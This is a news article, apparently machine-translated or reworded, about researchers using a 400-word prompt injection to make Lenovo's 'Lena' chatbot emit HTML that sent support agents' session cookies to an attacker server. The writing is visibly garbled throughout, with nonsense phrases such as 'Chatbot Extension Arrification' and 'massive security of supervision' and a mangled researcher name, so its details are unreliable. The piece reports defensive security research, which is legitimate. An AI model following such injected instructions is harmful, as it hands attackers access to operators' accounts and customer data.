- Scientists found a way to fool Lenovos Ai -Chatbot Lena
- Lena shared active session cookies with the researchers
- Malicious requests could be used for a wide range of attacks
Lena, the chat-driven chatbot shown on Lenovo’s web site could be transformed into a malicious insider, wasted company secrets or running malware by using nothing but a convincing prompt, experts have warned.
Security researchers on Cygenerws managed to get active session cookies from human customer support agents, essentially take over their accounts, access sensitive data and potentially turn elsewhere in the corporate network.
“The discovery highlights more security issues: Incorrect user input saver, incorrect Chatbot Extension Arrification, the web server that does not verify content produced by Chatbot, run unverified code and load content from arbitrary web resources. This leaves a lot of cross-identification options (XSS) attacks,” researchers say in their report.
“Massive Security Supervision”
In the heart of the problem, they said is the fact that chatbots are “people pleasers”. Without proper railing baked in, they will do as they are told and they are unable to distinguish a benign request from a malicious.
In this case, Cygenerws Researchers wrote a 400-word prompt in which Chatbot was asked to generate an HTML response.
The response contained secret instructions for access to resources from a server during strikers’ control of instructions to send the data obtained from the client browser.
They also emphasized that although their tests resulted in session cookie theft, the end result could be pretty much everything.
“This is not limited to stealing cookies. It may also be possible to perform some system commands which can allow for the installation of back doors and lateral movement to other servers and computers on the network,” Cygenerws Explained.
“We didn’t try any of this,” they added.
After notifying Lenovo of his findings, Cygenerws Was told that the tech giant “protected its systems” without specifying exactly what was done – a “massive security of supervision” of potentially devastating consequences.
The researchers encouraged all companies using chatbots to assume that all outputs are “potentially malicious” and to act accordingly.



